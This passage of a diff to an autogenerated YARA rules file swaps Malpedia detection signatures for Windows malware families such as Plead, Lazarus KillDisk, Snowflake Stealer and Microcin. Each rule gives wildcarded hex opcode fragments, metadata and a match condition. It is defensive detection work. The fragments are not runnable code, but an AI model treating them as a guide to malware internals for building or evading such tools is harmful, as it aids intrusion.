 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 33d2 448d4240 488d8d60100000 e8???????? 488d0d9a6e0100 e8???????? 4c8bc0 }
-		$sequence_1 = { 488945a0 488d0592d20400 4885db 7424 83630800 488903 }
-		$sequence_2 = { c7442434323b3831 c74424383738363a c744243c02005b00 c74424407e006900 c744244461005d00 c74424485e005200 c744244c52005400 }
-		$sequence_3 = { f30f7f458f 482bf3 4889742420 4c8d458f 488d55a7 498bce e8???????? }
-		$sequence_4 = { 488d8a50000000 e9???????? 4055 4883ec20 488bea 8b8598000000 83e002 }
-		$sequence_5 = { eb24 488d152e6b0600 488d4b02 483bce 7714 41803c1f30 750d }
-		$sequence_6 = { c7442460474e595a c7442464080a5d0d c74424685b5a4659 c744246c10475f51 c7442470141e5e19 c74424744b4b5f4f c744247848262600 }
-		$sequence_7 = { 498bd6 498bcd ff5038 498b4740 488b4808 48894d97 488b01 }
-		$sequence_8 = { ebd7 488d053e4d0300 ba80000000 0f1000 410f1106 0f104810 410f114e10 }
-		$sequence_9 = { 894c2420 ff15???????? eb0c 48630d???????? e8???????? }
+		$sequence_0 = { 0f8441050000 50 ff75fc e8???????? 59 59 }
+		$sequence_1 = { 8b85b4feffff 48 3bc8 731b }
+		$sequence_2 = { 50 ff15???????? 8d85a4fdffff c645dc17 50 e8???????? 83c414 }
+		$sequence_3 = { c3 55 8bec 83ec24 56 8b750c }
+		$sequence_4 = { 53 8b5d10 56 57 8b7d0c 7410 a0???????? }
+		$sequence_5 = { 8bd8 3bde 7d13 68???????? ff15???????? }
+		$sequence_6 = { 56 56 ff15???????? 8d859cf6ffff 50 8d859cf8ffff 68???????? }
+		$sequence_7 = { 50 ff15???????? 83c40c eb2e ff7508 ff15???????? }
+		$sequence_8 = { 7e33 8d85f4feffff 50 56 e8???????? 85c0 7422 }
+		$sequence_9 = { 3bc6 59 a3???????? 750c 50 ff15???????? }
 
 	condition:
-		7 of them and filesize < 1211392
+		7 of them and filesize < 335872
 }
-rule MALPEDIA_Win_Zhcat_Auto : FILE
+rule MALPEDIA_Win_Murkytop_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0341c55f-b49b-59ad-9995-dc165ee721c5"
+		id = "09dd87b2-848c-59f6-89b2-09fd740bcdeb"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zhcat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.zhcat_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.murkytop"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.murkytop_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "4527f43b00c94d79075579376bd5c0c607ad5c4bcbb3975ed225c4c4eea50561"
+		logic_hash = "d0c9a9dcefc5b4fab8d861110dfc72a07f2978208e468d91616835a5f37c61c4"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -114958,34 +114864,34 @@ rule MALPEDIA_Win_Zhcat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff7510 668945c6 ffd7 8b3d???????? 8945c8 8b45fc 33f6 }
-		$sequence_1 = { e8???????? a1???????? 59 803d????????00 }
-		$sequence_2 = { 8d45d4 50 8d45ec 50 33db 8d45f8 }
-		$sequence_3 = { 8bc6 c1f805 8b048540604100 83e61f c1e606 59 c644300400 }
-		$sequence_4 = { 7506 394c2418 742c c705????????01000000 eb20 8b450c }
-		$sequence_5 = { ffd7 6a02 8945d8 58 ff7514 668945c4 ffd6 }
-		$sequence_6 = { c3 8bff 56 57 33ff ffb7004e4100 ff15???????? }
-		$sequence_7 = { 3b04cd20434100 7413 41 83f92d 72f1 }
-		$sequence_8 = { e8???????? 8b45f8 8b4dfc 83c40c 894104 }
-		$sequence_9 = { 7407 68???????? ebd3 39742418 7507 68???????? ebc6 }
+		$sequence_0 = { 8bc6 c1f805 57 83e61f 8d3c85e0f54100 8b07 }
+		$sequence_1 = { 0f8827040000 8b5d08 8d7dec e8???????? 85c0 0f8814040000 6803010000 }
+		$sequence_2 = { 50 68???????? e8???????? 8b45fc 8b4868 51 }
+		$sequence_3 = { 8b4de8 51 68???????? e8???????? 8b55f0 }
+		$sequence_4 = { 3bc6 7377 8bce e8???????? c745fc00000000 }
+		$sequence_5 = { 50 68???????? e8???????? 8b45fc 8b4824 51 e8???????? }
+		$sequence_6 = { 7551 8b4d08 85c9 745e 8b7918 b889888888 f7ef }
+		$sequence_7 = { 3bc7 7629 8bcf 8bd1 d1ea beffffff3f 2bf2 }
+		$sequence_8 = { b902000000 66894dc4 53 ff15???????? 668945c6 }
+		$sequence_9 = { 3c69 7404 3c49 757f c645fa01 e9???????? c645fe01 }
 
 	condition:
-		7 of them and filesize < 376832
+		7 of them and filesize < 294912
 }
-rule MALPEDIA_Win_Younglotus_Auto : FILE
+rule MALPEDIA_Win_Plead_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "04c5b48c-c00c-5587-800f-b26c8ea57f39"
+		id = "ea1e32f2-faad-594a-a682-0f661211cc9b"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.younglotus"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.younglotus_auto.yar#L1-L171"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.plead"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.plead_auto.yar#L1-L223"
 		license_url = "N/A"
-		logic_hash = "0969f03b284985af7df0ddb5d516ceb371a29a3573bcea4b892c82226c445838"
+		logic_hash = "e24e1751ade86b382e488f87af3eb86584ff682352dde27167e20cbed17a20c8"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -114997,38 +114903,46 @@ rule MALPEDIA_Win_Younglotus_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6802000080 e8???????? 83c41c 6a01 }
-		$sequence_1 = { c745e800000000 c745fc00000000 837d0c03 754c 6a03 }
-		$sequence_2 = { 8945c8 68???????? 8b45c8 50 }
-		$sequence_3 = { 83c404 8b4de0 51 ff55dc }
-		$sequence_4 = { c745ec00000000 c745fc00000000 8b450c 50 8b4d08 51 8b55e8 }
-		$sequence_5 = { 50 8b8d9cfeffff 51 ff15???????? c785a0feffff00000000 }
-		$sequence_6 = { 8b8d5cfeffff 83c114 e8???????? c645fc01 8b8d5cfeffff 83c124 e8???????? }
-		$sequence_7 = { 8b4508 50 e8???????? 83c404 8945a0 837da000 }
-		$sequence_8 = { 53 56 57 68???????? ff15???????? 8945dc 68???????? }
-		$sequence_9 = { 8b703c 03f0 813e50450000 0f85e8000000 }
-		$sequence_10 = { 83f802 7503 33c0 c3 6a01 58 }
-		$sequence_11 = { e8???????? 83c41c 8d85e8feffff 6804010000 53 50 }
-		$sequence_12 = { 33f6 8975fc 397508 68ff010000 56 56 }
-		$sequence_13 = { 85c0 8945f4 7e49 6a04 53 50 }
-		$sequence_14 = { ff750c ff7508 50 e8???????? 8d430f 83c40c }
-		$sequence_15 = { bf00040000 57 8d85e4fbffff 53 50 e8???????? }
+		$sequence_0 = { 56 897d14 e8???????? 83c40c 8d4514 }
+		$sequence_1 = { 8b4514 56 881c30 ff15???????? }
+		$sequence_2 = { 40 50 6a01 ff15???????? 83c40c }
+		$sequence_3 = { 90 0145fc ff75fc ff15???????? }
+		$sequence_4 = { 53 6a05 ff7508 ff15???????? }
+		$sequence_5 = { 3bf7 740f ebda 33f6 }
+		$sequence_6 = { 50 8b4518 03c6 57 }
+		$sequence_7 = { ebda 33f6 c745fcf8ffffff 3bf7 750c 895dfc }
+		$sequence_8 = { 40 49 8975fc 75ec 8bc6 5e }
+		$sequence_9 = { 81c900ffffff 41 85c9 7e1c 55 }
+		$sequence_10 = { 33c0 81c418020000 c21000 8b84241c020000 6a00 6a00 6801020000 }
+		$sequence_11 = { 50 ff15???????? 33c0 81c418020000 }
+		$sequence_12 = { 7cf1 ffd3 8b35???????? 2bc7 3de8030000 760f }
+		$sequence_13 = { 8844341c 46 3bf1 7cf1 }
+		$sequence_14 = { c145fc05 8b75fc 33d2 8a10 03f2 40 }
+		$sequence_15 = { 6804010000 ff15???????? 8b4c2412 8b54240e 8b44240c }
+		$sequence_16 = { 648b1530000000 8b520c 8b521c 8b5a08 }
+		$sequence_17 = { eb02 8bfa 8955f4 897df0 }
+		$sequence_18 = { 8dbd00ffffff 33db 891f 0fb602 42 }
+		$sequence_19 = { 85c0 750f 6800800000 6a00 ff75f8 ff5648 eb0d }
+		$sequence_20 = { d3e0 f7c200000004 7403 80cc02 }
+		$sequence_21 = { 75f1 5e 8b4624 03c3 668b1450 }
+		$sequence_22 = { 8b562c c7048a00000000 8b7df0 8b07 }
+		$sequence_23 = { 8b4510 40 c1c803 ab 3bef }
 
 	condition:
-		7 of them and filesize < 106496
+		7 of them and filesize < 8224768
 }
-rule MALPEDIA_Win_Govrat_Auto : FILE
+rule MALPEDIA_Win_Lazarus_Killdisk_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0c1f568e-0870-502d-8ab7-d2bc8e9569e8"
+		id = "51d8d349-628d-5955-8390-6050e3d90319"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.govrat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.govrat_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lazarus_killdisk"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.lazarus_killdisk_auto.yar#L1-L117"
 		license_url = "N/A"
-		logic_hash = "abfba34e1bd79612302779859a269397cc43e8444d7e6090aaef75a3d69df6b1"
+		logic_hash = "0f1cb10726a24b0f5193b1d9b38bf0914806bbc39c92530769ca658a86bfb258"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -115042,32 +114956,32 @@ rule MALPEDIA_Win_Govrat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d4dc4 e8???????? 8b00 50 8d4708 895f10 895f14 }
-		$sequence_1 = { 897804 8b7904 8930 8b31 0facfe01 d1ef 83780400 }
-		$sequence_2 = { 59 03f1 8dbc24b8000000 33c0 f3a7 7418 }
-		$sequence_3 = { ff15???????? 83a65401000000 c3 53 55 56 8d6f44 }
-		$sequence_4 = { ff15???????? 83a65401000000 c3 53 55 }
-		$sequence_5 = { 6a00 6a00 ff15???????? 8b4c2404 8901 85c0 7404 }
-		$sequence_6 = { 832d????????04 e9???????? 55 8bec 83ec14 a1???????? 53 }
-		$sequence_7 = { 7543 837d1000 0f845cfeffff 8b87a8000000 2b442420 8b8fac000000 1b4c2424 }
-		$sequence_8 = { 8d4df8 8d4518 e8???????? 8b45f8 0b45fc 750a 2145fc }
-		$sequence_9 = { 8945f8 8b4508 ff700c ff15???????? 8bf0 }
+		$sequence_0 = { 8d48e0 80f93f 7706 0fbec0 83c020 }
+		$sequence_1 = { 56 ffd7 4b 75ea 56 ff15???????? }
+		$sequence_2 = { 7438 8d55f0 52 68???????? }
+		$sequence_3 = { 57 8d4c242c 68???????? 51 e8???????? }
+		$sequence_4 = { 8d4402ff 0fa4c109 6a00 894df4 8d4df4 c1e009 }
+		$sequence_5 = { 6a00 8d85e0fdffff 50 6800020000 }
+		$sequence_6 = { 6a00 6800000002 ffd3 8bf0 83feff }
+		$sequence_7 = { eb08 8d5de8 e8???????? 8b85e4fdffff 40 83c610 8985e4fdffff }
+		$sequence_8 = { 8d75a6 8b06 8b4e08 8b560c 8945e8 }
+		$sequence_9 = { ffd7 85c0 7424 68???????? 8d95e4feffff 52 }
 
 	condition:
-		7 of them and filesize < 761856
+		7 of them and filesize < 209920
 }
-rule MALPEDIA_Win_Vyveva_Auto : FILE
+rule MALPEDIA_Win_Snowflake_Stealer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c28bdd95-7642-5880-a40e-4b358402045a"
+		id = "f7453706-1ba2-5bd7-a0a7-c5c6de296895"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vyveva"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.vyveva_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.snowflake_stealer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.snowflake_stealer_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "96e07d213688d1c1087554cfee92b5503a65dfc0259352cd96965149acc4d781"
+		logic_hash = "c1c0789100e95962556dcffebd1be08f13443b80c1f6c738a94979e3119de2a7"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -115081,34 +114995,34 @@ rule MALPEDIA_Win_Vyveva_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7404 ff7604 59 3b7108 7506 50 8f4108 }
-		$sequence_1 = { 8b442428 3b4c2438 740c 3b4c2438 7406 33c9 034c2438 }
-		$sequence_2 = { 83ec04 33ed 8d6c2c74 83ed74 c74424fcffffffff 83ec04 68???????? }
-		$sequence_3 = { e8???????? 8b4c242c 8b442428 8d54243c 894c2440 6a08 52 }
-		$sequence_4 = { 037e3c 8d4c0f38 83e938 50 5f 51 52 }
-		$sequence_5 = { 51 5d 59 55 59 6a01 }
-		$sequence_6 = { 8b8c2434020000 8d54240c 894c240c 6a04 52 56 59 }
-		$sequence_7 = { 8365f000 8365f400 8365f800 8365fc00 c745f0900c0110 }
-		$sequence_8 = { 33c0 0306 395814 0f854b010000 8b4c2410 55 8f4614 }
-		$sequence_9 = { 741c 56 8b742414 ff36 59 41 51 }
+		$sequence_0 = { ff750c 6a5c 53 e8???????? 8b6c2448 56 ff7504 }
+		$sequence_1 = { ff742428 e8???????? 83c414 eb88 3dab000000 7530 837c243400 }
+		$sequence_2 = { ff3408 ff742444 e8???????? 8b7c2440 83c414 89442410 85c0 }
+		$sequence_3 = { e8???????? 59 59 8b4c243c 85c9 7409 51 }
+		$sequence_4 = { ff7640 e8???????? 83c42c 85c0 7533 6a08 8d442418 }
+		$sequence_5 = { ff742444 ff742440 50 e8???????? 8bf0 83c414 85f6 }
+		$sequence_6 = { c744240c01000000 eb08 3c2b 0f8593000000 46 8a0e 0fb6c1 }
+		$sequence_7 = { e8???????? 59 59 85c0 7507 8b4510 2138 }
+		$sequence_8 = { c744240800000000 29f1 89c6 1b7c2414 f7de c1fe1f 01f1 }
+		$sequence_9 = { ff743234 ff7524 ff742428 53 e8???????? 8b542428 83c414 }
 
 	condition:
-		7 of them and filesize < 360448
+		7 of them and filesize < 6196224
 }
-rule MALPEDIA_Win_Screencap_Auto : FILE
+rule MALPEDIA_Win_Microcin_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "379c64a1-3968-5838-b405-32978ebeeb34"
+		id = "dddf9fba-fce1-5368-9223-75a8c16c13ed"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.screencap"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.screencap_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.microcin"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.microcin_auto.yar#L1-L452"
 		license_url = "N/A"
-		logic_hash = "2175ebdcdf09489a5c3e9d1a0443dafe26fb70adb28f0b3b4f8cf2a642f56129"
+		logic_hash = "ab06ef293989aa12cd44a7f8f720c88cb322c4fba8d50dd4025a69de4fec24e0"
 		score = 75
-		quality = 75
+		quality = 44
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -115120,32 +115034,72 @@ rule MALPEDIA_Win_Screencap_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 750d 6800000080 6a06 ff15???????? }
-		$sequence_1 = { 488d0d1aba0000 e8???????? cc 488b4118 }
-		$sequence_2 = { 488d1557c90000 eb2b 488d153ec90000 eb22 }
-		$sequence_3 = { 488d156cd90000 488d8d90020000 4d8bc7 e8???????? 488d9580010000 488d4c2470 4533c9 }
-		$sequence_4 = { 48895c2408 57 4881ecb0000000 488d054cffffff 33db ba007f0000 33c9 }
-		$sequence_5 = { 4c8d442460 33d2 33c9 41d1e9 896c2428 4889742420 }
-		$sequence_6 = { eb4e 8d4306 39842420100000 7640 6a04 687c334700 55 }
-		$sequence_7 = { e9???????? 488d1554ca0000 e9???????? 498bd7 e9???????? 488d1570c60000 e9???????? }
-		$sequence_8 = { e9???????? 4c8bfb 4c8be3 488d055eeb0000 49c1fc05 4183e71f 4a8b0ce0 }
-		$sequence_9 = { 83c40c 8945a4 8975c8 897dcc 8975d0 8975d4 c645d800 }
+		$sequence_0 = { c7461401000000 4d8d8680000000 418900 4989b688000000 41c7868400000004000000 4533c9 }
+		$sequence_1 = { ff15???????? 488bcb 664489642438 488bf0 ff15???????? 0fb7cf }
+		$sequence_2 = { 897e04 5b 5f 5e 5d c20400 55 }
+		$sequence_3 = { 8d45ac 50 6801000080 ff15???????? }
+		$sequence_4 = { 85c0 7e18 80bc35a8feffff3a 741f 8d85a8feffff }
+		$sequence_5 = { ff15???????? 4863c8 c6840d8002000068 488d8d80020000 }
+		$sequence_6 = { 488b0d???????? ff15???????? 4885c0 742b 488b4018 }
+		$sequence_7 = { 4885c0 742b 488b4018 488b08 8b09 ff15???????? 488bf8 }
+		$sequence_8 = { 50 6805100000 68ffff0000 56 8b35???????? ffd6 }
+		$sequence_9 = { 8d85f8feffff 6804010000 50 ff15???????? 8d85f8feffff }
+		$sequence_10 = { ff15???????? 4863c8 807c0c5f5c 7413 488d4c2460 ff15???????? 4863c8 }
+		$sequence_11 = { ff15???????? 8b3d???????? 8d85e0feffff 50 }
+		$sequence_12 = { 33f6 50 ffd3 85c0 7e18 }
+		$sequence_13 = { 488b05???????? 4833c4 488985f0040000 4c8b3d???????? 4533c0 8bfa }
+		$sequence_14 = { 8b1d???????? 8d85a8feffff 50 ffd3 }
+		$sequence_15 = { 488b1d???????? 488903 48894308 488b0d???????? }
+		$sequence_16 = { 7647 498bcd e8???????? 4c8d05b7120100 41b903000000 488d4c45bc 488bc1 }
+		$sequence_17 = { 6828010000 8d85ccfeffff 6a00 50 }
+		$sequence_18 = { 488d0d950c0100 ff15???????? 4885c0 7419 }
+		$sequence_19 = { 7419 488d15730c0100 488bc8 ff15???????? }
+		$sequence_20 = { 7541 8b4df0 83c108 51 }
+		$sequence_21 = { 7370 696465726167656e 742e 657865 }
+		$sequence_22 = { 83ec08 894df8 c745fc00a40000 6a40 6800100000 }
+		$sequence_23 = { 53 53 56 43 }
+		$sequence_24 = { 498bd5 ff15???????? 418d7c24e7 85c0 752a 4c8d0502130100 8bd7 }
+		$sequence_25 = { 8b8c8d78feffff 890c90 ebc8 e9???????? 33c0 }
+		$sequence_26 = { c745f46d737664 c745ec5f6c6569 0fbe4dee 83c101 884dee c745f872742e64 }
+		$sequence_27 = { 8d8da0f4ffff e8???????? 8b8574dfffff 5e 8be5 }
+		$sequence_28 = { 8b4dfc 83c108 51 ff15???????? 8b4dfc }
+		$sequence_29 = { 4883ec20 8bd9 488d0d950c0100 ff15???????? }
+		$sequence_30 = { 8b4508 0fb608 81e107000080 7905 49 83c9f8 41 }
+		$sequence_31 = { e8???????? 85c0 751a 488d15f8110100 }
+		$sequence_32 = { e8???????? cc 4c8d056c120100 498bd4 488bcd }
+		$sequence_33 = { 83c208 52 ff15???????? 6a06 ff15???????? ebcd 8be5 }
+		$sequence_34 = { 726f 6e 6d 656e 7400 }
+		$sequence_35 = { fa fa fa fa fa }
+		$sequence_36 = { 4c8d0574130100 488bcd 418bd4 e8???????? 33c9 85c0 }
+		$sequence_37 = { 636373 7673 6873742e65 7865 }
+		$sequence_38 = { 660fd645ec 660fd645f4 3d89000000 0f87b2010000 0fb68030184000 ff2485d8174000 68???????? }
+		$sequence_39 = { 63f6 48 89d9 6a08 41 58 4f }
+		$sequence_40 = { 50 56 c785a4fcffff24020000 ff15???????? 85c0 7431 }
+		$sequence_41 = { 8d85f0feffff 6a00 50 e8???????? 83c408 8d95f0feffff }
+		$sequence_42 = { 680000cf00 68???????? 8d842480000000 50 6a00 ff15???????? }
+		$sequence_43 = { 68???????? e8???????? 8b7508 c7465cf8814000 }
+		$sequence_44 = { c785b4feffff00000000 ff15???????? 50 56 ff15???????? 85c0 7e0f }
+		$sequence_45 = { e8???????? 3d1f047008 754e 49 8b4d08 49 8b5510 }
+		$sequence_46 = { 7523 56 8d44245c 50 }
+		$sequence_47 = { 40 ebf8 55 8bec 8b450c }
+		$sequence_48 = { 8b4060 6a40 6800100000 680c200000 6a00 8945f8 }
+		$sequence_49 = { 7521 4c 89e1 33d2 41 b800800000 41 }
 
 	condition:
-		7 of them and filesize < 1391616
+		7 of them and filesize < 417792
 }
-rule MALPEDIA_Win_Orchard_Auto : FILE
+rule MALPEDIA_Win_Global_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5c398118-a219-5655-a01d-698db312ac7e"
+		id = "84b4cf5c-c55a-5774-ae7f-5489c60753fa"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.orchard"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.orchard_auto.yar#L1-L159"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.global"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.global_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "ef8c17e904478cac826167cfa0e1c29f054430dec351151f351e3917ccca81f2"
+		logic_hash = "09a9ad56bfef0ecdecd0c2b9ffb27931c564f59791efd5813a14ce69fded76ce"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -115159,38 +115113,32 @@ rule MALPEDIA_Win_Orchard_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b49fc 83c223 2bc1 83c0fc 83f81f 0f877e030000 52 }
-		$sequence_1 = { 83c028 895de0 8b5de8 894348 }
-		$sequence_2 = { 8b75a8 46 56 e8???????? 8bf8 }
-		$sequence_3 = { 89542420 f7e1 8bc8 8954240c }
-		$sequence_4 = { 56 ff15???????? ff15???????? 50 6a00 }
-		$sequence_5 = { 8d442410 50 ff15???????? 6685c0 }
-		$sequence_6 = { 6a05 c70600000000 c7461000000000 c746140f000000 68???????? }
-		$sequence_7 = { f7f9 81c2d0070000 52 ffd6 }
-		$sequence_8 = { 0f877e030000 52 51 e8???????? 83c408 }
-		$sequence_9 = { 50 ff15???????? 83f805 7507 }
-		$sequence_10 = { c645fc08 e8???????? 894604 83c404 8d4718 897034 8d5804 }
-		$sequence_11 = { 83c404 e8???????? 99 b95b000000 f7f9 }
-		$sequence_12 = { 89542428 8b54240c 83d200 03c1 }
-		$sequence_13 = { e8???????? 894604 83c318 897730 }
-		$sequence_14 = { 8bc8 8bc7 8d9d48ffffff c645fc03 }
-		$sequence_15 = { 8bc8 8bc7 8d5c2460 c68424a800000001 e8???????? 50 }
+		$sequence_0 = { 8b44243c 8d1c2a 8d341f 03c6 89442468 }
+		$sequence_1 = { 899634100000 8b54be3c c1c80a c1ca17 33d0 8b8610100000 c1c808 }
+		$sequence_2 = { 807e1400 7507 8bce e8???????? 8b5e0c 8b7730 }
+		$sequence_3 = { 8bc2 c1e808 884306 884b03 885307 8b4d08 8bc1 }
+		$sequence_4 = { 23cb 23ce 03c9 c1f91f 23ca 8b54242c c1fa1f }
+		$sequence_5 = { 6a01 51 e8???????? 8b8c2430020000 8bc6 5f 5e }
+		$sequence_6 = { 7412 8b4c2434 ff7108 57 50 e8???????? 83c40c }
+		$sequence_7 = { 8b8e4c100000 899678100000 8b949e00080000 c1c816 c1ca09 33d0 }
+		$sequence_8 = { 8db8bc4d4300 57 ff15???????? ff0d???????? 83ef18 83ee01 75eb }
+		$sequence_9 = { e8???????? 8d85b80c0000 50 ff75ac ff75a8 e8???????? 83c418 }
 
 	condition:
-		7 of them and filesize < 4716352
+		7 of them and filesize < 475136
 }
-rule MALPEDIA_Win_Scoring_Math_Tea_Auto : FILE
+rule MALPEDIA_Win_Sasfis_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6a5f2479-dd77-5460-b6ab-7a1fa699026a"
+		id = "faa37fe5-b8ae-5b3d-8761-9ca44fa700a7"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.scoring_math_tea"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.scoring_math_tea_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sasfis"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sasfis_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "a12d9d501b7d3baa59a060b6fa56cd1bfb57e15b553bc88c44e1282cce7ff1d8"
+		logic_hash = "cf32d2a1a7d6bbcae913d88ae0d2c6c9327ff9b8dad43d2e492ba8c00cbedd6a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -115204,34 +115152,34 @@ rule MALPEDIA_Win_Scoring_Math_Tea_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 448bfe 448be6 89742450 4889b42420010000 0f57c0 f30f7f842430010000 4533c0 }
-		$sequence_1 = { 66894dea 488d4de0 0fb700 668945ec 33c0 }
-		$sequence_2 = { 4889458c 33c0 894594 66894598 48b85700650064000000 4889459a 33c0 }
-		$sequence_3 = { 83ef01 7986 4885db 743d 488b45af 482bc3 48c1f802 }
-		$sequence_4 = { 83e00a eb09 33c0 eb05 b80a000000 488b5c2430 }
-		$sequence_5 = { e8???????? 90 488d4c2420 e8???????? 4889742420 4889742430 4889742438 }
-		$sequence_6 = { 49ffc6 4183c708 443b3a 72d7 8b02 }
-		$sequence_7 = { 410fb702 6643390413 7515 4983c202 4883ef01 75eb 4c8bc1 }
-		$sequence_8 = { e8???????? 458d41ff 41bfffff0000 8d7a02 4963c8 664139b44a18100000 7511 }
-		$sequence_9 = { 49ffc1 413801 7513 4883c108 49ffc1 8a01 413801 }
+		$sequence_0 = { 241c 2c05 006188 c526 3503007ca3 ef 2b30 }
+		$sequence_1 = { 0bb2ea7632d3 728b 896b90 35d0797819 d581 }
+		$sequence_2 = { 880c24 8d642450 e9???????? 60 }
+		$sequence_3 = { 8f44241c f9 66ffc7 0fbdfa 80fe07 87742418 660fbafe06 }
+		$sequence_4 = { 036e20 43 7465 47 }
+		$sequence_5 = { 2030 51 090a 4d 1321 }
+		$sequence_6 = { 66893c24 89442434 9c 660fbef8 9c 89542438 68d58c61ca }
+		$sequence_7 = { 660fbec2 660fb6c0 8b4500 e8???????? 661584f0 fec0 27 }
+		$sequence_8 = { 7aae 2931 55 3cf4 b729 0300 47 }
+		$sequence_9 = { 9c 8f442440 8d3cfd9c379c8f 66ffcf }
 
 	condition:
-		7 of them and filesize < 881664
+		7 of them and filesize < 8060928
 }
-rule MALPEDIA_Win_Redsalt_Auto : FILE
+rule MALPEDIA_Win_Cuegoe_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a92418fc-758f-521f-ba9d-200fd663af62"
+		id = "1c8a706e-da68-55ba-a4ca-eaa50b244652"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.redsalt"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.redsalt_auto.yar#L1-L221"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cuegoe"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cuegoe_auto.yar#L1-L128"
 		license_url = "N/A"
